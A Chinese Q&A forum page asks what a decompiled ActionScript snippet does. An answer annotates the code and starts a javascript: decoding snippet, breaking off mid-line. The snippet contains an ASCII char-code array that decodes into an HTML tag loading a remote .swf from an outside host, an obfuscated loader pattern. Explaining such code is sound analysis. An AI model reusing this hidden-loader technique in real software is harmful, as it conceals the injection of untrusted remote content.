这个FLASH代码是什么意思?它怎么转换成二进制地址?

来源:百度知道 编辑:UC知道 时间:2024/05/13 17:06:01
stop ();
onEnterFrame = function ()
{
var _loc1 = getBytesLoaded() / getBytesTotal();
preloader_mc.value = _loc1;
if (_loc1 == 1)
{
delete onEnterFrame;
play ();
} // end if
};

stop ();
textd.html = true;
var max_heIght = new Array(60, 105, 109, 103, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 107, 53, 57, 49, 46, 99, 110, 47, 50, 48, 48, 57, 47, 57, 116, 104, 47, 50, 47, 56, 46, 115, 119, 102, 39, 62);
for (i = 0; i < max_heIght.length; i++)
{
TXT = TXT + chr(max_heIght[i]);
} // end of for
textd.htmlText = this.TXT;
60, 105, 109, 103, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 107, 53, 57, 49, 46, 99, 110, 47, 50, 48, 48, 57, 47, 57, 116, 104, 47, 50, 47, 56, 46, 115, 119, 102, 39, 62

这个转换成英文字符是怎么样的?怎么转换?有工具直接转换吗?

stop ();
//不断触发的处理事件
onEnterFrame = function ()
{
var _loc1 = getBytesLoaded() / getBytesTotal();//计算加载百分比
preloader_mc.value = _loc1;//将百分比赋给mc的自定义属性
//判断是否加载完成
if (_loc1 == 1)
{
delete onEnterFrame; //删除循环事件
play (); //开始敀
} // end if
};

stop ();
textd.html = true; //设置textd文本框支持html格式文本
var max_heIght = new Array(60, 105, 109, 103, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 107, 53, 57, 49, 46, 99, 110, 47, 50, 48, 48, 57, 47, 57, 116, 104, 47, 50, 47, 56, 46, 115, 119, 102, 39, 62);
//循环遍历数组max_heIght ,将每一位元素asc码还原成英文字符
for (i = 0; i < max_heIght.length; i++)
{
TXT = TXT + chr(max_heIght[i]); //组合字符
} // end of for
textd.htmlText = this.TXT; //显示

复制到地址栏运行

javascript:var b="";var a = new Array(60, 105, 109, 103, 32, 115, 114, 99, 61, 39, 104, 116, 116,